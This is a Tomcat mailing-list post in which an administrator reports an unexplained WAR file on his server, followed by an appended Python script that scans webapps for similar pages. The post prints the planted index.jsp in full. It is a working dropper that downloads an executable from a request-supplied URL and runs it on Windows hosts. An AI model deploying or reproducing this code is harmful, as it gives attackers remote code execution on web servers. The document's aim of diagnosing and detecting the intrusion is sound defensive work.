tomcat-users mailing list archives

From Warren Bell <war...@clarksnutrition.com>
Subject Possible virus uploaded to Tomcat 5.5.3
Date Fri, 08 Aug 2008 18:17:51 GMT
I have found a WAR file on my server that appeared around July 14. I am
the only one that has access to this machine and I did not put it there.
It consists of a JSP that downloads a program named init.exe and then
executes it. This server is on a private network. There are three PC
kiosks in grocery stores that are available to the public and that
access this server, but they are on a different subnet and only have
access to the server through port 8080. I am pretty sure it came from one
of these stores. The URL used for this program is
.../fexcep/index.jsp?url=... I am running Tomcat 5.5.3 on Windows XP.

How did somebody get this WAR file onto my server?

Here is the code of index.jsp:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*,java.security.*,javax.crypto.*"%>
<%!
    String sys=null;
       
public class AutoKill {
   
    private boolean downFile(String url,String filesrc)
    {
        try
        {
        URL urlc = new URL(url);
        HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
        con.connect();
        byte[] b=new byte[1024];
        BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
        FileOutputStream fos=new FileOutputStream(filesrc);
        int length=-1;
        while((length=bis.read(b,0,b.length))!=-1)
        {
            fos.write(b,0,length);
        }
        fos.close();
        bis.close();
        return true;
        }catch(Exception e)
        {
        e.printStackTrace();   
        }
        return false;
    }
}

%>
<%
        sys=System.getProperty("os.name");
        int i=sys.indexOf("Windows");
        AutoKill ak=new AutoKill();
        if(i>-1)
        {
            String result;
            try
            {
                String url=request.getParameter("userurl");
                System.out.println(url);
                String filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
                if (ak.downFile(url,filesrc) )
                {
                    Process run_proc=Runtime.getRuntime().exec(filesrc);
                    result="Success! ";
                }
                else
                {
                    result="Failure! Down File Failure!";
                }

            }catch(Exception e)
            {
                result="Failure!throws Exception - "+e.getMessage()+"! ";
            }
            request.setAttribute("result",result);
        }
        else
        {
            request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
        }
               
        request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>





-- 
Thanks,

Warren Bell
909-645-8864
warren@clarksnutrition.com


---------------------------------------------------------------------
To start a new topic, e-mail: users@tomcat.apache.org
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
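
A triage check for the kind of page shown in this message, added here as an example (it is not part of the original post or of Tomcat): it walks an unpacked webapps directory and flags JSPs that both open an outbound connection and start a process. The indicator names, the regexes and the sample tree built in demo() are constructed for illustration, and the script assumes WARs have been unpacked under the directory it is given.

```python
import re
import tempfile
from pathlib import Path

# Constructed indicator set, based on the constructs visible in the posted index.jsp.
INDICATORS = {
    "process_exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|\bProcessBuilder\s*\("),
    "outbound_fetch": re.compile(r"\.openConnection\s*\(|\.openStream\s*\("),
    "file_write": re.compile(r"\bFileOutputStream\s*\("),
    "webroot_path": re.compile(r"\.getRealPath\s*\("),
    "request_input": re.compile(r"request\s*\.\s*getParameter\s*\("),
}

def score_jsp(text):
    """Return the sorted names of the indicators present in one JSP source."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def is_dropper_like(hits):
    """Flag pages that both fetch remote content and start a process."""
    return "process_exec" in hits and "outbound_fetch" in hits

def scan_webapps(webapps_dir):
    """Walk an unpacked webapps tree; return {relative path: hits} for flagged JSPs."""
    root = Path(webapps_dir)
    findings = {}
    for path in root.rglob("*"):
        if path.suffix.lower() not in (".jsp", ".jspx") or not path.is_file():
            continue
        hits = score_jsp(path.read_text(encoding="utf-8", errors="replace"))
        if is_dropper_like(hits):
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Run the scan over a constructed two-app tree (sample files, not real data)."""
    suspicious = ('<% String u = request.getParameter("userurl");\n'
                  'java.net.URL c = new java.net.URL(u); c.openConnection();\n'
                  'String f = application.getRealPath("") + "/init.exe";\n'
                  'new java.io.FileOutputStream(f).close();\n'
                  'Runtime.getRuntime().exec(f); %>')
    benign = '<% String name = request.getParameter("name"); %><p>Hello</p>'
    with tempfile.TemporaryDirectory() as tmp:
        for app, body in (("fexcep", suspicious), ("shop", benign)):
            (Path(tmp) / app).mkdir()
            (Path(tmp) / app / "index.jsp").write_text(body, encoding="utf-8")
        return scan_webapps(tmp)

if __name__ == "__main__":
    for rel, hits in demo().items():
        print(rel, hits)
```

A hit is a prompt to review the file and its timestamps, not proof of compromise; legitimate admin pages can match the same pair of indicators.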

